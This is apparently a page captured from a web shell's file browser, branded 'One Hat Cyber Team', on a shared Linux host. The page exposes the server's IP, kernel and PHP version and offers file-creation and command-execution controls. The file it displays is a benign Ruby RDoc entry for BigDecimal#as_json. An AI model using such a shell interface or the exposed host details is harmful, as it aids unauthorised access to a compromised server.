⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.116
Server IP:
78.40.11.138
Server:
Linux tango.o2switch.net 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
alt
/
ruby33
/
share
/
ri
/
system
/
BigDecimal
/
View File Name :
as_json-i.ri
U:RDoc::AnyMethod[iI"as_json:ETI"BigDecimal#as_json;TF:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"RMethods <tt>BigDecimal#as_json</tt> and +BigDecimal.json_create+ may be used ;TI"8to serialize and deserialize a \BigDecimal object; ;TI"#see Marshal[rdoc-ref:Marshal].;To:RDoc::Markup::BlankLine o; ; [I"<\Method <tt>BigDecimal#as_json</tt> serializes +self+, ;TI"4returning a 2-element hash representing +self+:;T@o:RDoc::Markup::Verbatim; [ I"#require 'json/add/bigdecimal' ;TI"^x = BigDecimal(2).as_json # => {"json_class"=>"BigDecimal", "b"=>"27:0.2e1"} ;TI"^y = BigDecimal(2.0, 4).as_json # => {"json_class"=>"BigDecimal", "b"=>"36:0.2e1"} ;TI"^z = BigDecimal(Complex(2, 0)).as_json # => {"json_class"=>"BigDecimal", "b"=>"27:0.2e1"} ;T:@format0o; ; [I"T\Method +JSON.create+ deserializes such a hash, returning a \BigDecimal object:;T@o;; [I"*BigDecimal.json_create(x) # => 0.2e1 ;TI"*BigDecimal.json_create(y) # => 0.2e1 ;TI")BigDecimal.json_create(z) # => 0.2e1;T; 0: @fileI"(ext/json/lib/json/add/bigdecimal.rb;T:0@omit_headings_from_table_of_contents_below000[ I"(*);T@#FI"BigDecimal;TcRDoc::NormalClass00